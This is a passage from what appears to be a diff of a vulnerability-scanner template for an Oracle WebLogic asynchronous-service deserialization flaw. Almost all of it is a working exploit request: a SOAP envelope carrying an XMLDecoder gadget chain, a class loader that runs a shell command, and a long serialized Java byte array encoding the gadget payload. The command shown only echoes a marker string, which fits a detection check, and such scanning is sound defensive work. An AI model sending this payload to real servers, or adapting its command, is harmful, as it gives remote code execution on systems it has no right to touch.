AAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
 
-    matchers-condition: and
+      - |
+        POST /_async/AsyncResponseService HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class="byte" length="3478"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="40"><byte>0</byte></void><void index="41"><byte>0</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="44"><byte>0</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="72"><byte>0</byte></void><void index="73"><byte>0</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="78"><byte>0</byte></void><void index="79"><byte>0</byte></void><void index="80"><byte>0</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="84"><byte>0</byte></void><void index="85"><byte>0</byte></void><void index="86"><byte>0</byte></void><void index="87"><byte>0</byte></void><void index="88"><byte>0</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void index="92"><byte>0</byte></void><void index="93"><byte>58</byte></void><void index="94"><byte>99</byte></void><void index="95"><byte>111</byte></void><void index="96"><byte>109</byte></void><void index="97"><byte>46</byte></void><void index="98"><byte>115</byte></void><void index="99"><byte>117</byte></void><void index="100"><byte>110</byte></void><void index="101"><byte>46</byte></void><void index="102"><byte>111</byte></void><void index="103"><byte>114</byte></void><void index="104"><byte>103</byte></void><void index="105"><byte>46</byte></void><void index="106"><byte>97</byte></void><void index="107"><byte>112</byte></void><void index="108"><byte>97</byte></void><void index="109"><byte>99</byte></void><void index="110"><byte>104</byte></void><void index="111"><byte>101</byte></void><void index="112"><byte>46</byte></void><void index="113"><byte>120</byte></void><void index="114"><byte>97</byte></void><void index="115"><byte>108</byte></void><void index="116"><byte>97</byte></void><void index="117"><byte>110</byte></void><void index="118"><byte>46</byte></void><void index="119"><byte>105</byte></void><void index="120"><byte>110</byte></void><void index="121"><byte>116</byte></void><void index="122"><byte>101</byte></void><void index="123"><byte>114</byte></void><void index="124"><byte>110</byte></void><void index="125"><byte>97</byte></void><void index="126"><byte>108</byte></void><void index="127"><byte>46</byte></void><void index="128"><byte>120</byte></void><void index="129"><byte>115</byte></void><void index="130"><byte>108</byte></void><void index="131"><byte>116</byte></void><void index="132"><byte>99</byte></void><void index="133"><byte>46</byte></void><void index="134"><byte>116</byte></void><void index="135"><byte>114</byte></void><void index="136"><byte>97</byte></void><void index="137"><byte>120</byte></void><void index="138"><byte>46</byte></void><void index="139"><byte>84</byte></void><void index="140"><byte>101</byte></void><void index="141"><byte>109</byte></void><void index="142"><byte>112</byte></void><void index="143"><byte>108</byte></void><void index="144"><byte>97</byte></void><void index="145"><byte>116</byte></void><void index="146"><byte>101</byte></void><void index="147"><byte>115</byte></void><void index="148"><byte>73</byte></void><void index="149"><byte>109</byte></void><void index="150"><byte>112</byte></void><void index="151"><byte>108</byte></void><void index="152"><byte>9</byte></void><void index="153"><byte>87</byte></void><void index="154"><byte>79</byte></void><void index="155"><byte>-63</byte></void><void index="156"><byte>110</byte></void><void index="157"><byte>-84</byte></void><void index="158"><byte>-85</byte></void><void index="159"><byte>51</byte></void><void index="160"><byte>3</byte></void><void index="161"><byte>0</byte></void><void index="162"><byte>6</byte></void><void index="163"><byte>73</byte></void><void index="164"><byte>0</byte></void><void index="165"><byte>13</byte></void><void index="166"><byte>95</byte></void><void index="167"><byte>105</byte></void><void index="168"><byte>110</byte></void><void index="169"><byte>100</byte></void><void index="170"><byte>101</byte></void><void index="171"><byte>110</byte></void><void index="172"><byte>116</byte></void><void index="173"><byte>78</byte></void><void index="174"><byte>117</byte></void><void index="175"><byte>109</byte></void><void index="176"><byte>98</byte></void><void index="177"><byte>101</byte></void><void index="178"><byte>114</byte></void><void index="179"><byte>73</byte></void><void index="180"><byte>0</byte></void><void index="181"><byte>14</byte></void><void index="182"><byte>95</byte></void><void index="183"><byte>116</byte></void><void index="184"><byte>114</byte></void><void index="185"><byte>97</byte></void><void index="186"><byte>110</byte></void><void index="187"><byte>115</byte></void><void index="188"><byte>108</byte></void><void index="189"><byte>101</byte></void><void index="190"><byte>116</byte></void><void index="191"><byte>73</byte></void><void index="192"><byte>110</byte></void><void index="193"><byte>100</byte></void><void index="194"><byte>101</byte></void><void index="195"><byte>120</byte></void><void index="196"><byte>91</byte></void><void index="197"><byte>0</byte></void><void index="198"><byte>10</byte></void><void index="199"><byte>95</byte></void><void index="200"><byte>98</byte></void><void index="201"><byte>121</byte></void><void index="202"><byte>116</byte></void><void index="203"><byte>101</byte></void><void index="204"><byte>99</byte></void><void index="205"><byte>111</byte></void><void index="206"><byte>100</byte></void><void index="207"><byte>101</byte></void><void index="208"><byte>115</byte></void><void index="209"><byte>116</byte></void><void index="210"><byte>0</byte></void><void index="211"><byte>3</byte></void><void index="212"><byte>91</byte></void><void index="213"><byte>91</byte></void><void index="214"><byte>66</byte></void><void index="215"><byte>91</byte></void><void index="216"><byte>0</byte></void><void index="217"><byte>6</byte></void><void index="218"><byte>95</byte></void><void index="219"><byte>99</byte></void><void index="220"><byte>108</byte></void><void index="221"><byte>97</byte></void><void index="222"><byte>115</byte></void><void index="223"><byte>115</byte></void><void index="224"><byte>116</byte></void><void index="225"><byte>0</byte></void><void index="226"><byte>18</byte></void><void index="227"><byte>91</byte></void><void index="228"><byte>76</byte></void><void index="229"><byte>106</byte></void><void index="230"><byte>97</byte></void><void index="231"><byte>118</byte></void><void index="232"><byte>97</byte></void><void index="233"><byte>47</byte></void><void index="234"><byte>108</byte></void><void index="235"><byte>97</byte></void><void index="236"><byte>110</byte></void><void index="237"><byte>103</byte></void><void index="238"><byte>47</byte></void><void index="239"><byte>67</byte></void><void index="240"><byte>108</byte></void><void index="241"><byte>97</byte></void><void index="242"><byte>115</byte></void><void index="243"><byte>115</byte></void><void index="244"><byte>59</byte></void><void index="245"><byte>76</byte></void><void index="246"><byte>0</byte></void><void index="247"><byte>5</byte></void><void index="248"><byte>95</byte></void><void index="249"><byte>110</byte></void><void index="250"><byte>97</byte></void><void index="251"><byte>109</byte></void><void index="252"><byte>101</byte></void><void index="253"><byte>116</byte></void><void index="254"><byte>0</byte></void><void index="255"><byte>18</byte></void><void index="256"><byte>76</byte></void><void index="257"><byte>106</byte></void><void index="258"><byte>97</byte></void><void index="259"><byte>118</byte></void><void index="260"><byte>97</byte></void><void index="261"><byte>47</byte></void><void index="262"><byte>108</byte></void><void index="263"><byte>97</byte></void><void index="264"><byte>110</byte></void><void index="265"><byte>103</byte></void><void index="266"><byte>47</byte></void><void index="267"><byte>83</byte></void><void index="268"><byte>116</byte></void><void index="269"><byte>114</byte></void><void index="270"><byte>105</byte></void><void index="271"><byte>110</byte></void><void index="272"><byte>103</byte></void><void index="273"><byte>59</byte></void><void index="274"><byte>76</byte></void><void index="275"><byte>0</byte></void><void index="276"><byte>17</byte></void><void index="277"><byte>95</byte></void><void index="278"><byte>111</byte></void><void index="279"><byte>117</byte></void><void index="280"><byte>116</byte></void><void index="281"><byte>112</byte></void><void index="282"><byte>117</byte></void><void index="283"><byte>116</byte></void><void index="284"><byte>80</byte></void><void index="285"><byte>114</byte></void><void index="286"><byte>111</byte></void><void index="287"><byte>112</byte></void><void index="288"><byte>101</byte></void><void index="289"><byte>114</byte></void><void index="290"><byte>116</byte></void><void index="291"><byte>105</byte></void><void index="292"><byte>101</byte></void><void index="293"><byte>115</byte></void><void index="294"><byte>116</byte></void><void index="295"><byte>0</byte></void><void index="296"><byte>22</byte></void><void index="297"><byte>76</byte></void><void index="298"><byte>106</byte></void><void index="299"><byte>97</byte></void><void index="300"><byte>118</byte></void><void index="301"><byte>97</byte></void><void index="302"><byte>47</byte></void><void index="303"><byte>117</byte></void><void index="304"><byte>116</byte></void><void index="305"><byte>105</byte></void><void index="306"><byte>108</byte></void><void index="307"><byte>47</byte></void><void index="308"><byte>80</byte></void><void index="309"><byte>114</byte></void><void index="310"><byte>111</byte></void><void index="311"><byte>112</byte></void><void index="312"><byte>101</byte></void><void index="313"><byte>114</byte></void><void index="314"><byte>116</byte></void><void index="315"><byte>105</byte></void><void index="316"><byte>101</byte></void><void index="317"><byte>115</byte></void><void index="318"><byte>59</byte></void><void index="319"><byte>120</byte></void><void index="320"><byte>112</byte></void><void index="321"><byte>0</byte></void><void index="322"><byte>0</byte></void><void index="323"><byte>0</byte></void><void index="324"><byte>0</byte></void><void index="325"><byte>-1</byte></void><void index="326"><byte>-1</byte></void><void index="327"><byte>-1</byte></void><void index="328"><byte>-1</byte></void><void index="329"><byte>117</byte></void><void index="330"><byte>114</byte></void><void index="331"><byte>0</byte></void><void index="332"><byte>3</byte></void><void index="333"><byte>91</byte></void><void index="334"><byte>91</byte></void><void index="335"><byte>66</byte></void><void index="336"><byte>75</byte></void><void index="337"><byte>-3</byte></void><void index="338"><byte>25</byte></void><void index="339"><byte>21</byte></void><void index="340"><byte>103</byte></void><void index="341"><byte>103</byte></void><void index="342"><byte>-37</byte></void><void index="343"><byte>55</byte></void><void index="344"><byte>2</byte></void><void index="345"><byte>0</byte></void><void index="346"><byte>0</byte></void><void index="347"><byte>120</byte></void><void index="348"><byte>112</byte></void><void index="349"><byte>0</byte></void><void index="350"><byte>0</byte></void><void index="351"><byte>0</byte></void><void index="352"><byte>2</byte></void><void index="353"><byte>117</byte></void><void index="354"><byte>114</byte></void><void index="355"><byte>0</byte></void><void index="356"><byte>2</byte></void><void index="357"><byte>91</byte></void><void index="358"><byte>66</byte></void><void index="359"><byte>-84</byte></void><void index="360"><byte>-13</byte></void><void index="361"><byte>23</byte></void><void index="362"><byte>-8</byte></void><void index="363"><byte>6</byte></void><void index="364"><byte>8</byte></void><void index="365"><byte>84</byte></void><void index="366"><byte>-32</byte></void><void index="367"><byte>2</byte></void><void index="368"><byte>0</byte></void><void index="369"><byte>0</byte></void><void index="370"><byte>120</byte></void><void index="371"><byte>112</byte></void><void index="372"><byte>0</byte></void><void index="373"><byte>0</byte></void><void index="374"><byte>8</byte></void><void index="375"><byte>-82</byte></void><void index="376"><byte>-54</byte></void><void index="377"><byte>-2</byte></void><void index="378"><byte>-70</byte></void><void index="379"><byte>-66</byte></void><void index="380"><byte>0</byte></void><void index="381"><byte>0</byte></void><void index="382"><byte>0</byte></void><void index="383"><byte>50</byte></void><void index="384"><byte>0</byte></void><void index="385"><byte>99</byte></void><void index="386"><byte>10</byte></void><void index="387"><byte>0</byte></void><void index="388"><byte>3</byte></void><void index="389"><byte>0</byte></void><void index="390"><byte>34</byte></void><void index="391"><byte>7</byte></void><void index="392"><byte>0</byte></void><void index="393"><byte>97</byte></void><void index="394"><byte>7</byte></void><void index="395"><byte>0</byte></void><void index="396"><byte>37</byte></void><void index="397"><byte>7</byte></void><void index="398"><byte>0</byte></void><void index="399"><byte>38</byte></void><void index="400"><byte>1</byte></void><void index="401"><byte>0</byte></void><void index="402"><byte>16</byte></void><void index="403"><byte>115</byte></void><void index="404"><byte>101</byte></void><void index="405"><byte>114</byte></void><void index="406"><byte>105</byte></void><void index="407"><byte>97</byte></void><void index="408"><byte>108</byte></void><void index="409"><byte>86</byte></void><void index="410"><byte>101</byte></void><void index="411"><byte>114</byte></void><void index="412"><byte>115</byte></void><void index="413"><byte>105</byte></void><void index="414"><byte>111</byte></void><void index="415"><byte>110</byte></void><void index="416"><byte>85</byte></void><void index="417"><byte>73</byte></void><void index="418"><byte>68</byte></void><void index="419"><byte>1</byte></void><void index="420"><byte>0</byte></void><void index="421"><byte>1</byte></void><void index="422"><byte>74</byte></void><void index="423"><byte>1</byte></void><void index="424"><byte>0</byte></void><void index="425"><byte>13</byte></void><void index="426"><byte>67</byte></void><void index="427"><byte>111</byte></void><void index="428"><byte>110</byte></void><void index="429"><byte>115</byte></void><void index="430"><byte>116</byte></void><void index="431"><byte>97</byte></void><void index="432"><byte>110</byte></void><void index="433"><byte>116</byte></void><void index="434"><byte>86</byte></void><void index="435"><byte>97</byte></void><void index="436"><byte>108</byte></void><void index="437"><byte>117</byte></void><void index="438"><byte>101</byte></void><void index="439"><byte>5</byte></void><void index="440"><byte>-83</byte></void><void index="441"><byte>32</byte></void><void index="442"><byte>-109</byte></void><void index="443"><byte>-13</byte></void><void index="444"><byte>-111</byte></void><void index="445"><byte>-35</byte></void><void index="446"><byte>-17</byte></void><void index="447"><byte>62</byte></void><void index="448"><byte>1</byte></void><void index="449"><byte>0</byte></void><void index="450"><byte>6</byte></void><void index="451"><byte>60</byte></void><void index="452"><byte>105</byte></void><void index="453"><byte>110</byte></void><void index="454"><byte>105</byte></void><void index="455"><byte>116</byte></void><void index="456"><byte>62</byte></void><void index="457"><byte>1</byte></void><void index="458"><byte>0</byte></void><void index="459"><byte>3</byte></void><void index="460"><byte>40</byte></void><void index="461"><byte>41</byte></void><void index="462"><byte>86</byte></void><void index="463"><byte>1</byte></void><void index="464"><byte>0</byte></void><void index="465"><byte>4</byte></void><void index="466"><byte>67</byte></void><void index="467"><byte>111</byte></void><void index="468"><byte>100</byte></void><void index="469"><byte>101</byte></void><void index="470"><byte>1</byte></void><void index="471"><byte>0</byte></void><void index="472"><byte>15</byte></void><void index="473"><byte>76</byte></void><void index="474"><byte>105</byte></void><void index="475"><byte>110</byte></void><void index="476"><byte>101</byte></void><void index="477"><byte>78</byte></void><void index="478"><byte>117</byte></void><void index="479"><byte>109</byte></void><void index="480"><byte>98</byte></void><void index="481"><byte>101</byte></void><void index="482"><byte>114</byte></void><void index="483"><byte>84</byte></void><void index="484"><byte>97</byte></void><void index="485"><byte>98</byte></void><void index="486"><byte>108</byte></void><void index="487"><byte>101</byte></void><void index="488"><byte>1</byte></void><void index="489"><byte>0</byte></void><void index="490"><byte>18</byte></void><void index="491"><byte>76</byte></void><void index="492"><byte>111</byte></void><void index="493"><byte>99</byte></void><void index="494"><byte>97</byte></void><void index="495"><byte>108</byte></void><void index="496"><byte>86</byte></void><void index="497"><byte>97</byte></void><void index="498"><byte>114</byte></void><void index="499"><byte>105</byte></void><void index="500"><byte>97</byte></void><void index="501"><byte>98</byte></void><void index="502"><byte>108</byte></void><void index="503"><byte>101</byte></void><void index="504"><byte>84</byte></void><void index="505"><byte>97</byte></void><void index="506"><byte>98</byte></void><void index="507"><byte>108</byte></void><void index="508"><byte>101</byte></void><void index="509"><byte>1</byte></void><void index="510"><byte>0</byte></void><void index="511"><byte>4</byte></void><void index="512"><byte>116</byte></void><void index="513"><byte>104</byte></void><void index="514"><byte>105</byte></void><void index="515"><byte>115</byte></void><void index="516"><byte>1</byte></void><void index="517"><byte>0</byte></void><void index="518"><byte>19</byte></void><void index="519"><byte>83</byte></void><void index="520"><byte>116</byte></void><void index="521"><byte>117</byte></void><void index="522"><byte>98</byte></void><void index="523"><byte>84</byte></void><void index="524"><byte>114</byte></void><void index="525"><byte>97</byte></void><void index="526"><byte>110</byte></void><void index="527"><byte>115</byte></void><void index="528"><byte>108</byte></void><void index="529"><byte>101</byte></void><void index="530"><byte>116</byte></void><void index="531"><byte>80</byte></void><void index="532"><byte>97</byte></void><void index="533"><byte>121</byte></void><void index="534"><byte>108</byte></void><void index="535"><byte>111</byte></void><void index="536"><byte>97</byte></void><void index="537"><byte>100</byte></void><void index="538"><byte>1</byte></void><void index="539"><byte>0</byte></void><void index="540"><byte>12</byte></void><void index="541"><byte>73</byte></void><void index="542"><byte>110</byte></void><void index="543"><byte>110</byte></void><void index="544"><byte>101</byte></void><void index="545"><byte>114</byte></void><void index="546"><byte>67</byte></void><void index="547"><byte>108</byte></void><void index="548"><byte>97</byte></void><void index="549"><byte>115</byte></void><void index="550"><byte>115</byte></void><void index="551"><byte>101</byte></void><void index="552"><byte>115</byte></void><void index="553"><byte>1</byte></void><void index="554"><byte>0</byte></void><void index="555"><byte>53</byte></void><void index="556"><byte>76</byte></void><void index="557"><byte>121</byte></void><void index="558"><byte>115</byte></void><void index="559"><byte>111</byte></void><void index="560"><byte>115</byte></void><void index="561"><byte>101</byte></void><void index="562"><byte>114</byte></void><void index="563"><byte>105</byte></void><void index="564"><byte>97</byte></void><void index="565"><byte>108</byte></void><void index="566"><byte>47</byte></void><void index="567"><byte>112</byte></void><void index="568"><byte>97</byte></void><void index="569"><byte>121</byte></void><void index="570"><byte>108</byte></void><void index="571"><byte>111</byte></void><void index="572"><byte>97</byte></void><void index="573"><byte>100</byte></void><void index="574"><byte>115</byte></void><void index="575"><byte>47</byte></void><void index="576"><byte>117</byte></void><void index="577"><byte>116</byte></void><void index="578"><byte>105</byte></void><void index="579"><byte>108</byte></void><void index="580"><byte>47</byte></void><void index="581"><byte>71</byte></void><void index="582"><byte>97</byte></void><void index="583"><byte>100</byte></void><void index="584"><byte>103</byte></void><void index="585"><byte>101</byte></void><void index="586"><byte>116</byte></void><void index="587"><byte>115</byte></void><void index="588"><byte>36</byte></void><void index="589"><byte>83</byte></void><void index="590"><byte>116</byte></void><void index="591"><byte>117</byte></void><void index="592"><byte>98</byte></void><void index="593"><byte>84</byte></void><void index="594"><byte>114</byte></void><void index="595"><byte>97</byte></void><void index="596"><byte>110</byte></void><void index="597"><byte>115</byte></void><void index="598"><byte>108</byte></void><void index="599"><byte>101</byte></void><void index="600"><byte>116</byte></void><void index="601"><byte>80</byte></void><void index="602"><byte>97</byte></void><void index="603"><byte>121</byte></void><void index="604"><byte>108</byte></void><void index="605"><byte>111</byte></void><void index="606"><byte>97</byte></void><void index="607"><byte>100</byte></void><void index="608"><byte>59</byte></void><void index="609"><byte>1</byte></void><void index="610"><byte>0</byte></void><void index="611"><byte>9</byte></void><void index="612"><byte>116</byte></void><void index="613"><byte>114</byte></void><void index="614"><byte>97</byte></void><void index="615"><byte>110</byte></void><void index="616"><byte>115</byte></void><void index="617"><byte>102</byte></void><void index="618"><byte>111</byte></void><void index="619"><byte>114</byte></void><void index="620"><byte>109</byte></void><void index="621"><byte>1</byte></void><void index="622"><byte>0</byte></void><void index="623"><byte>114</byte></void><void index="624"><byte>40</byte></void><void index="625"><byte>76</byte></void><void index="626"><byte>99</byte></void><void index="627"><byte>111</byte></void><void index="628"><byte>109</byte></void><void index="629"><byte>47</byte></void><void index="630"><byte>115</byte></void><void index="631"><byte>117</byte></void><void index="632"><byte>110</byte></void><void index="633"><byte>47</byte></void><void index="634"><byte>111</byte></void><void index="635"><byte>114</byte></void><void index="636"><byte>103</byte></void><void index="637"><byte>47</byte></void><void index="638"><byte>97</byte></void><void index="639"><byte>112</byte></void><void index="640"><byte>97</byte></void><void index="641"><byte>99</byte></void><void index="642"><byte>104</byte></void><void index="643"><byte>101</byte></void><void index="644"><byte>47</byte></void><void index="645"><byte>120</byte></void><void index="646"><byte>97</byte></void><void index="647"><byte>108</byte></void><void index="648"><byte>97</byte></void><void index="649"><byte>110</byte></void><void index="650"><byte>47</byte></void><void index="651"><byte>105</byte></void><void index="652"><byte>110</byte></void><void index="653"><byte>116</byte></void><void index="654"><byte>101</byte></void><void index="655"><byte>114</byte></void><void index="656"><byte>110</byte></void><void index="657"><byte>97</byte></void><void index="658"><byte>108</byte></void><void index="659"><byte>47</byte></void><void index="660"><byte>120</byte></void><void index="661"><byte>115</byte></void><void index="662"><byte>108</byte></void><void index="663"><byte>116</byte></void><void index="664"><byte>99</byte></void><void index="665"><byte>47</byte></void><void index="666"><byte>68</byte></void><void index="667"><byte>79</byte></void><void index="668"><byte>77</byte></void><void index="669"><byte>59</byte></void><void index="670"><byte>91</byte></void><void index="671"><byte>76</byte></void><void index="672"><byte>99</byte></void><void index="673"><byte>111</byte></void><void index="674"><byte>109</byte></void><void index="675"><byte>47</byte></void><void index="676"><byte>115</byte></void><void index="677"><byte>117</byte></void><void index="678"><byte>110</byte></void><void index="679"><byte>47</byte></void><void index="680"><byte>111</byte></void><void index="681"><byte>114</byte></void><void index="682"><byte>103</byte></void><void index="683"><byte>47</byte></void><void index="684"><byte>97</byte></void><void index="685"><byte>112</byte></void><void index="686"><byte>97</byte></void><void index="687"><byte>99</byte></void><void index="688"><byte>104</byte></void><void index="689"><byte>101</byte></void><void index="690"><byte>47</byte></void><void index="691"><byte>120</byte></void><void index="692"><byte>109</byte></void><void index="693"><byte>108</byte></void><void index="694"><byte>47</byte></void><void index="695"><byte>105</byte></void><void index="696"><byte>110</byte></void><void index="697"><byte>116</byte></void><void index="698"><byte>101</byte></void><void index="699"><byte>114</byte></void><void index="700"><byte>110</byte></void><void index="701"><byte>97</byte></void><void index="702"><byte>108</byte></void><void index="703"><byte>47</byte></void><void index="704"><byte>115</byte></void><void index="705"><byte>101</byte></void><void index="706"><byte>114</byte></void><void index="707"><byte>105</byte></void><void index="708"><byte>97</byte></void><void index="709"><byte>108</byte></void><void index="710"><byte>105</byte></void><void index="711"><byte>122</byte></void><void index="712"><byte>101</byte></void><void index="713"><byte>114</byte></void><void index="714"><byte>47</byte></void><void index="715"><byte>83</byte></void><void index="716"><byte>101</byte></void><void index="717"><byte>114</byte></void><void index="718"><byte>105</byte></void><void index="719"><byte>97</byte></void><void index="720"><byte>108</byte></void><void index="721"><byte>105</byte></void><void index="722"><byte>122</byte></void><void index="723"><byte>97</byte></void><void index="724"><byte>116</byte></void><void index="725"><byte>105</byte></void><void index="726"><byte>111</byte></void><void index="727"><byte>110</byte></void><void index="728"><byte>72</byte></void><void index="729"><byte>97</byte></void><void index="730"><byte>110</byte></void><void index="731"><byte>100</byte></void><void index="732"><byte>108</byte></void><void index="733"><byte>101</byte></void><void index="734"><byte>114</byte></void><void index="735"><byte>59</byte></void><void index="736"><byte>41</byte></void><void index="737"><byte>86</byte></void><void index="738"><byte>1</byte></void><void index="739"><byte>0</byte></void><void index="740"><byte>8</byte></void><void index="741"><byte>100</byte></void><void index="742"><byte>111</byte></void><void index="743"><byte>99</byte></void><void index="744"><byte>117</byte></void><void index="745"><byte>109</byte></void><void index="746"><byte>101</byte></void><void index="747"><byte>110</byte></void><void index="748"><byte>116</byte></void><void index="749"><byte>1</byte></void><void index="750"><byte>0</byte></void><void index="751"><byte>45</byte></void><void index="752"><byte>76</byte></void><void index="753"><byte>99</byte></void><void index="754"><byte>111</byte></void><void index="755"><byte>109</byte></void><void index="756"><byte>47</byte></void><void index="757"><byte>115</byte></void><void index="758"><byte>117</byte></void><void index="759"><byte>110</byte></void><void index="760"><byte>47</byte></void><void index="761"><byte>111</byte></void><void index="762"><byte>114</byte></void><void index="763"><byte>103</byte></void><void index="764"><byte>47</byte></void><void index="765"><byte>97</byte></void><void index="766"><byte>112</byte></void><void index="767"><byte>97</byte></void><void index="768"><byte>99</byte></void><void index="769"><byte>104</byte></void><void index="770"><byte>101</byte></void><void index="771"><byte>47</byte></void><void index="772"><byte>120</byte></void><void index="773"><byte>97</byte></void><void index="774"><byte>108</byte></void><void index="775"><byte>97</byte></void><void index="776"><byte>110</byte></void><void index="777"><byte>47</byte></void><void index="778"><byte>105</byte></void><void index="779"><byte>110</byte></void><void index="780"><byte>116</byte></void><void index="781"><byte>101</byte></void><void index="782"><byte>114</byte></void><void index="783"><byte>110</byte></void><void index="784"><byte>97</byte></void><void index="785"><byte>108</byte></void><void index="786"><byte>47</byte></void><void index="787"><byte>120</byte></void><void index="788"><byte>115</byte></void><void index="789"><byte>108</byte></void><void index="790"><byte>116</byte></void><void index="791"><byte>99</byte></void><void index="792"><byte>47</byte></void><void index="793"><byte>68</byte></void><void index="794"><byte>79</byte></void><void index="795"><byte>77</byte></void><void index="796"><byte>59</byte></void><void index="797"><byte>1</byte></void><void index="798"><byte>0</byte></void><void index="799"><byte>8</byte></void><void index="800"><byte>104</byte></void><void index="801"><byte>97</byte></void><void index="802"><byte>110</byte></void><void index="803"><byte>100</byte></void><void index="804"><byte>108</byte></void><void index="805"><byte>101</byte></void><void index="806"><byte>114</byte></void><void index="807"><byte>115</byte></void><void index="808"><byte>1</byte></void><void index="809"><byte>0</byte></void><void index="810"><byte>66</byte></void><void index="811"><byte>91</byte></void><void index="812"><byte>76</byte></void><void index="813"><byte>99</byte></void><void index="814"><byte>111</byte></void><void index="815"><byte>109</byte></void><void index="816"><byte>47</byte></void><void index="817"><byte>115</byte></void><void index="818"><byte>117</byte></void><void index="819"><byte>110</byte></void><void index="820"><byte>47</byte></void><void index="821"><byte>111</byte></void><void index="822"><byte>114</byte></void><void index="823"><byte>103</byte></void><void index="824"><byte>47</byte></void><void index="825"><byte>97</byte></void><void index="826"><byte>112</byte></void><void index="827"><byte>97</byte></void><void index="828"><byte>99</byte></void><void index="829"><byte>104</byte></void><void index="830"><byte>101</byte></void><void index="831"><byte>47</byte></void><void index="832"><byte>120</byte></void><void index="833"><byte>109</byte></void><void index="834"><byte>108</byte></void><void index="835"><byte>47</byte></void><void index="836"><byte>105</byte></void><void index="837"><byte>110</byte></void><void index="838"><byte>116</byte></void><void index="839"><byte>101</byte></void><void index="840"><byte>114</byte></void><void index="841"><byte>110</byte></void><void index="842"><byte>97</byte></void><void index="843"><byte>108</byte></void><void index="844"><byte>47</byte></void><void index="845"><byte>115</byte></void><void index="846"><byte>101</byte></void><void index="847"><byte>114</byte></void><void index="848"><byte>105</byte></void><void index="849"><byte>97</byte></void><void index="850"><byte>108</byte></void><void index="851"><byte>105</byte></void><void index="852"><byte>122</byte></void><void index="853"><byte>101</byte></void><void index="854"><byte>114</byte></void><void index="855"><byte>47</byte></void><void index="856"><byte>83</byte></void><void index="857"><byte>101</byte></void><void index="858"><byte>114</byte></void><void index="859"><byte>105</byte></void><void index="860"><byte>97</byte></void><void index="861"><byte>108</byte></void><void index="862"><byte>105</byte></void><void index="863"><byte>122</byte></void><void index="864"><byte>97</byte></void><void index="865"><byte>116</byte></void><void index="866"><byte>105</byte></void><void index="867"><byte>111</byte></void><void index="868"><byte>110</byte></void><void index="869"><byte>72</byte></void><void index="870"><byte>97</byte></void><void index="871"><byte>110</byte></void><void index="872"><byte>100</byte></void><void index="873"><byte>108</byte></void><void index="874"><byte>101</byte></void><void index="875"><byte>114</byte></void><void index="876"><byte>59</byte></void><void index="877"><byte>1</byte></void><void index="878"><byte>0</byte></void><void index="879"><byte>10</byte></void><void index="880"><byte>69</byte></void><void index="881"><byte>120</byte></void><void index="882"><byte>99</byte></void><void index="883"><byte>101</byte></void><void index="884"><byte>112</byte></void><void 